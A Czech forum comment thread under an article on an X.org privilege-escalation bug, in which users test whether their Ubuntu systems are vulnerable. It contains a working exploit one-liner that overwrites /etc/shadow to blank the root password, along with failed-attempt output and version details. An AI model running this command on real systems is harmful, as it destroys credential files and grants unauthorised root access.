Vlákno názorů k článku
Chyba v X.org umožňuje eskalaci práv na Linuxu i BSD
od marvinek - Na Ubuntu/Mint to opravdu nefunguje , viz muj...
-
anon (neregistrovaný)
Mas stary Xorg.
Introduced by: https://gitlab.freedesktop.org/xorg/xserver/commit/032b1d79b7d04d47814a5b3a9fdd162249fea74c (1.19.0)
-
v Xubuntu 18.04, take neprojde:
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
/usr/lib/xorg/Xorg.wrap: Only console users are allowed to run the X server
Heslo:
su: Selhání autentizace
soubor /etc/shadow samozrejme to nezmenilopozadavek pro exploit, nastavene root setuid pro Xorg zde proste neni ;-)
ls -l `which Xorg`
-rwxr-xr-x 1 root root 274 zář 5 13:38 /usr/bin/Xorg -
v konzoli take neprojde:
$ cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
(EE)
Fatal server error:
(EE) Cannot move old log file "shadow" to "shadow.old"
(EE)
(EE)
Please consult the The X.Org Foundation support
at http://wiki.x.org
for help.
(EE)
Heslo:
su: Selhání autentizace
shadow beze zmeny...
$ ls -l /etc/shadow
-rw-r----- 1 root shadow 1702 říj 17 22:37 /etc/shadowverze Xorg neni nova/zaplatovana:
X.Org X Server 1.19.6
Release Date: 2017-12-20
X Protocol Version 11, Revision 0
Build Operating System: Linux 4.4.0-135-generic x86_64 Ubuntu
Current Operating System: Linux t420s 4.15.0-34-generic #37-Ubuntu SMP Mon Aug 27 15:21:48 UTC 2018 x86_64
Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.15.0-34-generic root=/dev/mapper/wd-root ro quiet splash net.ifnames=0 intel_iommu=on resume=/dev/wd/swap vt.handoff=1
Build Date: 24 September 2018 01:45:59PM
xorg-server 2:1.19.6-1ubuntu4.1 (For technical support please see http://www.ubuntu.com/support)
Current version of pixman: 0.34.0
Before reporting problems, check http://wiki.x.org
to make sure that you have the latest version.
